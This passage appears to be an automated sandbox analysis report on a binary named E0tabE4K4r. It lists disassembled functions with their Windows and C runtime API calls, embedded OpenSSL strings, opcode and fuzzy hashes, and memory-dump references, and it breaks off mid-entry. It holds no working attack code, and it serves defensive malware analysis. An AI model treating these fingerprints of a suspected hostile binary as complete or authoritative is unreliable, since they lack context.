                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                                                                    • API String ID: 2102423945-3653307630
                                                                                                                                                    • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                                    • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                                                                    • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                                    • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                                                                      • Part of subcall function 0042501F: GetLastError.KERNEL32(00000001,00000000,0042520D,00420CE9,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00425021
                                                                                                                                                      • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                                                                      • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                                                                      • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                                                                      • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00425083
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                                                                    Strings
                                                                                                                                                    • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                                                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                    • API String ID: 3123740607-798102604
                                                                                                                                                    • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                    • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                                                                    • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                    • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _fprintf_memset
                                                                                                                                                    • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                                                    • API String ID: 3021507156-3399676524
                                                                                                                                                    • Opcode ID: 37c0a0619d1de68f8926526a4348b91c256fa9f986865ef3ae2ab210aec5a9ed
                                                                                                                                                    • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                                                                    • Opcode Fuzzy Hash: 37c0a0619d1de68f8926526a4348b91c256fa9f986865ef3ae2ab210aec5a9ed
                                                                                                                                                    • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                                                                                    • _strlen.LIBCMT ref: 00441734
                                                                                                                                                      • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                    • _strnlen.LIBCMT ref: 004417BF
                                                                                                                                                    • __lock.LIBCMT ref: 004417D0
                                                                                                                                                    • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2168648987-0
                                                                                                                                                    • Opcode ID: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
                                                                                                                                                    • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                                                                    • Opcode Fuzzy Hash: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
                                                                                                                                                    • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 0043B70B
                                                                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00710000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                    • _free.LIBCMT ref: 0043B71E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1020059152-0
                                                                                                                                                    • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                                                                                    • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                                                                    • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                                                                                    • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0041F0B6
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                                                                                                                                    • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1380987712-0
                                                                                                                                                    • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                    • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                                                                    • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                    • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0041E546
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                                                                                                                                    • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1380987712-0
                                                                                                                                                    • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                    • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                                                                    • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                    • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0041FA7B
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1380987712-0
                                                                                                                                                    • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                    • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                                                                    • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                    • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0041FE2B
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1380987712-0
                                                                                                                                                    • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                    • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                                                                    • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                    • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                                                                    • Opcode ID: 3e8e620cdafad959620aa8092266a2dd437b35ec9cc4a24f81571b5e96538b17
                                                                                                                                                    • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                                                                    • Opcode Fuzzy Hash: 3e8e620cdafad959620aa8092266a2dd437b35ec9cc4a24f81571b5e96538b17
                                                                                                                                                    • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004229A9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write
                                                                                                                                                    • String ID: A
                                                                                                                                                    • API String ID: 3115901604-2078354741
                                                                                                                                                    • Opcode ID: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                                                                                                                                                    • Instruction ID: 74c924880168de559db59c14e1a2c39f6381d3f38157317aef41ba5f0430eaff
                                                                                                                                                    • Opcode Fuzzy Hash: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                                                                                                                                                    • Instruction Fuzzy Hash: F041F870700626BFDB289F69EA8056F77A5BF44360B94813FE805C7740D6F8DD818B58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                                                                    • Opcode ID: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
                                                                                                                                                    • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                                                                    • Opcode Fuzzy Hash: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
                                                                                                                                                    • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00425341 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsnlen
                                                                                                                                                    • String ID: U
                                                                                                                                                    • API String ID: 3628947076-3372436214
                                                                                                                                                    • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                                                                                    • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                                                                                    • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                                                                                    • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                                                                    • API String ID: 2102423945-2013712220
                                                                                                                                                    • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                                    • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                                                                    • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                                    • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 0040C5DA
                                                                                                                                                    • UuidToStringA.RPCRT4(?,00000000), ref: 0040C5F6
                                                                                                                                                    • RpcStringFreeA.RPCRT4(00000000), ref: 0040C640
                                                                                                                                                    Strings
                                                                                                                                                    • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: StringUuid$CreateFree
                                                                                                                                                    • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                    • API String ID: 3044360575-2335240114
                                                                                                                                                    • Opcode ID: dc9514dc3cc728d26dfdc447613b7bcea16efd59eca3e38d4ff14dbb98031a68
                                                                                                                                                    • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                                                                    • Opcode Fuzzy Hash: dc9514dc3cc728d26dfdc447613b7bcea16efd59eca3e38d4ff14dbb98031a68
                                                                                                                                                    • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00437A2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
